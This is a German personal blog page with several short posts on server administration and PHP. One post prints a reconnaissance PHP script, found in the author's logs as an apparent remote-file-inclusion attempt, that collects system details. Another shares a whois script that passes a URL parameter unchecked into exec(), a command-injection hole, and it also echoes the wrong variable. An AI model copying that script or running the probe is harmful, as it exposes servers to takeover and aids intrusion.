PRoJEcTMuSIcAL – Blog

MakeUseOf.com hat wieder einmal ein paar interessante Links vorgestellt. Diesmal zum Thema “Kommandozeile“. Die Links führen zu Webseiten, die einem Profi vielleicht nichts Neues erzählen können, einem blutigen Anfänger oder einem frischgebackenen Fortgeschrittenen dafür bestimmt. Ein Blick lohnt sich dennoch so oder so.

Nadir Shell links, Server, Shell, tips & tricks, webseite

Ich gehöre zu den Webmastern, die regelmäßig die Logfiles analysieren, vor allem im Hinblick auf Spammern und sonstigen Unrat des Webs. Immer wieder mal finde ich da einen Versuch, der mir eine Datei unterschieben soll – wie ich annehme. Meist sind das irgendwelche kryptischen URLs, doch dieses Mal hat mich das schon stutzig gemacht, denn die Domain, war die der Gitarrenjugend Loga.

Ich habe mir die Textdatei mal angesehen, was man mir da denn schönes geben wollte und siehe da, mein Server sollte wohl ausgelesen werden:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>

URL dazu: http://www.gitarrenjugend-loga.de/news/include/safe1.txt

Für die Datei kann die Gitarrenjugend wahrscheinlich nichts, weil die dort über Hintertürchen gelandet ist – zumindest ist da in den meisten Fällen so.  Aber dennoch könnte es dazu führen, daß eben unbescholtene Bürger als Bösewichte hingestellt werden. Also Leute: Server sichern!

Gute Infos zu diesem Thema gibt es übrigens zum Beispiel hier

Nadir php html, injection, php, Server, software

Für meine Webseiten hatte ich vor Ewigkeiten mal eine Whois-Abfrage programmiert, die auch gut lief. Allerdings ist mir nun aufgefallen, daß bei der Abfrage von IP-Adressen entscheidend ist, welchen Whois-Server man verwendet. Also ging ich auf die Suche nach einem Script, das mir den richtigen Server heraussucht. Bei Domainabfragen kann man das relativ einfach über die Topleveldomain machen, bei IP-Adressen sieht es da schon schwieriger aus.

Nach langer Suche kam ich auf den Gedanken, daß ich ja den Befehl whois meines Servers ausprobieren kann (wenn ich da schon den Luxus habe ) und siehe da: whois hangelt sich selbst durch!

In PHP kann man also durch ein kleines Script eine nette Ausgabe zaubern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<?
/********
 * WHOIS-Abfrage
 * Copyright: Nadir 2009
 * IP wird über GET-Paramter übergeben.
 * Aufruf: script.php?ip=x.x.x.x
 * Voraussetzung: Serverbefehle müssen ausgeführt werden können 
 * (funktioniert auf Hostingpaketen evtl. nicht)
 * Ich übernehme keine Garantie oder Haftung für das Ausführen des Scripts.
*******************/
$ip = $_GET[ip];
exec("whois $ip", $temp);
 
foreach ($temp as $tp)
{
echo $t."<br>";
}
 
?>

Nadir lösungen, php php, script, Server, webseite, whois

Gestern abend, um 19:45 war plötzlich mein Server nicht mehr erreichbar. Das einzige Lebenszeichen bekam ich nur über ping. Erst heute morgen um 5:37 konnte ich wieder die ersten Logeinträge verzeichnen. Warum der Server nicht ging, weiß ich nicht.

Auf jeden Fall: Sorry, für die Wartezeit!

Nadir webseiten ausfall, Server

Vor einiger Zeit hatte ich das Problem, daß ich wissen mußte, ob auf meinem 1 & 1 Server mod_rewrite funktioniert oder nicht. Nach einer kurzen Befragung von Google fand ich den Test dazu auf http://www.wallpaperama.com (leider auf Englisch, vielleicht reiche ich mal eine deutsche Übersetzung nach). Nach dem Testen war klar: mod_rewrite ist nicht aktiviert.

Eine weitere Befragung von Google brachte zu Tage, daß ich es recht einfach aktivieren kann, wenn ich in meinem Adminbereich meines Servers PHP als Modul und nicht als CGI einbinde. Gut, habe ich dann auch mal umgestellt und siehe da, es klappte. Allerdings konnte dann die PHP-Funktion exec() nicht mehr ausgeführt werden…

Da das Script, für das ich mod_rewrite brauchte, leider nicht ganz funktionierte, habe ich PHP wieder auf den CGI Modus umgestellt. Mal schauen, wann ich mich das nächste Mal damit beschäftige.

Nadir lösungen, php 1 & 1, mod_rewrite, Server